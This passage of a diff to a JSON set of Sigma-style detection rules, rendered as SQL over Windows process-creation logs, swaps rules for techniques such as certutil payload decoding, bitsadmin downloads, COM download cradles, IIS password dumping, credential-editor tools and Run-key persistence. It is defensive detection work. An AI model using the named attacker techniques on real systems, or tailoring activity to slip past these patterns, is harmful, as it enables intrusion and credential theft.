'%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsaiso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\') AND NOT (((ParentProcessName LIKE '%\\\\SavService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (ParentProcessName = '' OR ParentProcessName = '-')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%~1\\\\%' ESCAPE '\\' OR CommandLine LIKE '%~2\\\\%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\GPSoftware\\\\Directory Opus\\\\dopus.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\veam.backup.shell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Everything\\\\Everything.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%\\\\appdata\\\\local\\\\webex\\\\webex64\\\\meetings\\\\wbxreport.exe%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\cmd\\\\scalar.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_proc_wrong_parent.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" }, { - "title": "Sdclt Child Processes", - "id": "da2738f2-fadb-4394-afa7-0a0674885afa", + "title": "File Decoded From Base64/Hex Via Certutil.EXE", + "id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", "status": "test", - "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-decode %' ESCAPE '\\' OR CommandLine LIKE '%/decode %' ESCAPE '\\' OR CommandLine LIKE '%-decodehex %' ESCAPE '\\' OR CommandLine LIKE '%/decodehex %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdclt_child_process.yml" + "filename": "proc_creation_win_certutil_decode.yml" }, { - "title": "Suspicious Download From Direct IP Via Bitsadmin", - "id": "99c840f2-2012-46fd-9141-c761987550ef", + "title": "PUA - Fast Reverse Proxy (FRP) Execution", + "id": "32410e29-5f94-4568-b6a3-d91a8adad863", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\frpc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" ], - "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" + "filename": "proc_creation_win_pua_frp.yml" }, { - "title": "Suspicious Parent Double Extension File Execution", - "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "title": "Microsoft IIS Service Account Password Dumped", + "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "status": "experimental", - "description": "Detect execution of suspicious double extension files in ParentCommandLine", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "author": "Tim Rauch, Janantha Marasinghe", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%.doc.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.doc.js' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_double_extension_parent.yml" + "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" }, { - "title": "Import LDAP Data Interchange Format File Via Ldifde.EXE", - "id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "title": "UEFI Persistence Via Wpbbin - ProcessCreation", + "id": "4abc0ec4-db5a-412f-9632-26659cddf145", "status": "experimental", - "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", - "author": "@gott_cyber", + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", + "attack.persistence", "attack.defense_evasion", - "attack.t1218", - "attack.t1105" + "attack.t1542.001" ], "falsepositives": [ - "Since the content of the files are unknown, false positives are expected" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND (CommandLine LIKE '%-i%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_ldifde_file_load.yml" + "filename": "proc_creation_win_wpbbin_potential_persistence.yml" }, { - "title": "Application Removed Via Wmic.EXE", - "id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "title": "Potential Persistence Via Microsoft Compatibility Appraiser", + "id": "f548a603-c9f2-4c89-b511-b089f7e94549", "status": "experimental", - "description": "Uninstall an application with wmic", - "author": "frac113", + "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", + "author": "Sreeman", "tags": [ - "attack.execution", - "attack.t1047" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%call%' ESCAPE '\\' OR CommandLine LIKE '%uninstall%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%run %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Application Experience\\\\Microsoft Compatibility Appraiser%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_uninstall_application.yml" + "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml" }, { - "title": "Set Files as System Files Using Attrib.EXE", - "id": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", - "status": "experimental", - "description": "Detects the execution of \"attrib\" with the \"+s\" flag to mark files as system files", - "author": "frack113", + "title": "Proxy Execution via Wuauclt", + "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "status": "test", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_attrib_system.yml" + "filename": "proc_creation_win_lolbin_wuauclt.yml" }, { - "title": "Potential Network Sniffing Activity Using Network Tools", - "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", - "status": "test", - "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Use of UltraVNC Remote Access Software", + "id": "145322e4-0fd3-486b-81ca-9addc75736d8", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate administration activity to troubleshoot network issues" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tshark.exe' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\windump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'VNCViewer' OR Product = 'UltraVNC VNCViewer' OR Company = 'UltraVNC' OR OriginalFileName = 'VNCViewer.exe'))" ], - "filename": "proc_creation_win_network_sniffing.yml" + "filename": "proc_creation_win_ultravnc.yml" }, { - "title": "Change Default File Association Via Assoc", - "id": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", - "status": "test", - "description": "Detects file association changes using the builtin \"assoc\" command.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Timur Zinniatullin, oscd.community", + "title": "Renamed Office Binary Execution", + "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "status": "experimental", + "description": "Detects the execution of a renamed office binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.001" + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%assoc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_assoc_execution.yml" + "filename": "proc_creation_win_renamed_office_processes.yml" }, { - "title": "Fsutil Drive Enumeration", - "id": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", - "status": "experimental", - "description": "Attackers may leverage fsutil to enumerated connected drives.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "title": "Execution via stordiag.exe", + "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "status": "test", + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "author": "Austin Songer (@austinsonger)", "tags": [ - "attack.discovery", - "attack.t1120" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Certain software or administrative tasks may trigger false positives." + "Legitimate usage of stordiag.exe." ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND CommandLine LIKE '%drives%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fsutil_drive_enumeration.yml" + "filename": "proc_creation_win_stordiag_susp_child_process.yml" }, { - "title": "Suspicious New Service Creation", - "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", - "status": "experimental", - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", + "id": "de587dce-915e-4218-aac4-835ca6af6f70", + "status": "test", + "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\' AND CommandLine LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_service_creation.yml" + "filename": "proc_creation_win_reg_add_run_key.yml" }, { - "title": "Potential COM Objects Download Cradles Usage - Process Creation", - "id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", - "status": "experimental", - "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", - "author": "frack113", + "title": "Script Interpreter Execution From Suspicious Folder", + "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "status": "test", + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059" + ], "falsepositives": [ - "Legitimate use of the library" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (CommandLine LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR CommandLine LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR CommandLine LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR CommandLine LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (NewProcessName LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_download_com_cradles.yml" + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" }, { - "title": "HackTool - ADCSPwn Execution", - "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", + "title": "HackTool - Windows Credential Editor (WCE) Execution", + "id": "7aa7009a-28b9-4344-8c1f-159489a390df", "status": "test", - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "description": "Detects the use of Windows Credential Editor (WCE)", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1557.001" + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Unlikely" + "Another service that uses a single -s command line switch" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_adcspwn.yml" + "filename": "proc_creation_win_hktl_wce.yml" }, { - "title": "Direct Autorun Keys Modification", - "id": "24357373-078f-44ed-9ac4-6d334a668a11", + "title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", "status": "test", - "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", + "description": "Detects automated lateral movement by Turla group", + "author": "Markus Neis", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows 